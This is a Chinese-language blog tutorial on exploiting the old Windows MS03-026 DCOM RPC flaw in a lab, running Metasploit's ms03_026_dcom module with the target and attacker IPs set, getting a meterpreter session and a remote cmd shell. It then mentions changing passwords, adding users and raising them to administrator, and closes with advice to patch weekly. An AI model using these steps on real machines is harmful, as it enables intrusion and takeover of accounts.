windows漏洞MS03_026
程序员文章站
2022-05-16 07:50:39
话不多说,直接进入正题 第一步查看是否能ping通,第二步就是扫描端口,开放了端口才能进行攻击 linux进入msfconsole,搜索03_026 等待一会,返回漏洞的全名,exploit是一个攻击模块 接下来就是使用这个漏洞(在linux里复制快捷键是ctrl+shift+c,粘贴快捷键是ctr ......
话不多说,直接进入正题
第一步查看是否能ping通,第二步就是扫描端口,开放了端口才能进行攻击
linux进入msfconsole,搜索03_026
search 03_026
等待一会,返回漏洞的全名,exploit是一个攻击模块
接下来就是使用这个漏洞(在linux里复制快捷键是ctrl+shift+c,粘贴快捷键是ctrl+shift+v,这样就不用按鼠标右键点)
use exploit/windows/dcerpc/ms03_026_dcom
显示需要配置的信息,条件
show options
只要是required一栏里,有yes的,都是必填项,第一行填的就是靶机的ip地址
set rhost 192.168.x.x
这时在设置一下攻击机的ip
set lhost 192.168.x.x
设置完毕后,就可以进行攻击了,可用exploit或者run进行,一般都是用exploit
exploit
这时前缀就不是msf了
已经变成meterpreter,这时候输入shell
就进入到靶机的cmd里
查看用户
linux查看
windows查看
可以看到,用户都是一样的,所以我们可以进行更改用户密码,还可以新建新的用户,并且还可以把普通用户提升为超级管理员
受到03_026影响的系统有
虽然受影响的系统都很老了,我们已经用不到了,但在现在的新系统又会有新的漏洞,只是还没有给发现,所以还是需要在日常生活中多去注意计算机的安全,要一周打一次补丁,否则哪天自己的计算机就遭殃了。
上一篇: Ai绘制一个方形的录音机图标
下一篇: 心里面积
推荐阅读
-
在Windows平台的Apache中配置Python
-
windows media player怎么看歌曲的详细内容或以此来进行分类
-
在WINDOWS上将Python 文件转为(生成)可执行程序 exe 文件
-
Win10创造者更新15002:Windows Defender电脑卫士
-
解决windows 运行 appium 提示 OSError: [WinError 10049] 在其上下文中,该请求的地址无效
-
Windows10新版升级停摆:涉及慢速、快速两个对外的Build通道
-
windows7系统下给WORD2010设置打开密码的方法
-
Windows10的份额创新低 Edge浏览器遭遇滑铁卢
-
使用xp_cmdshell注销Windows登录用户(终端服务器超出最大连接数)
-
sqlserver中关于WINDOWS性能计数器的介绍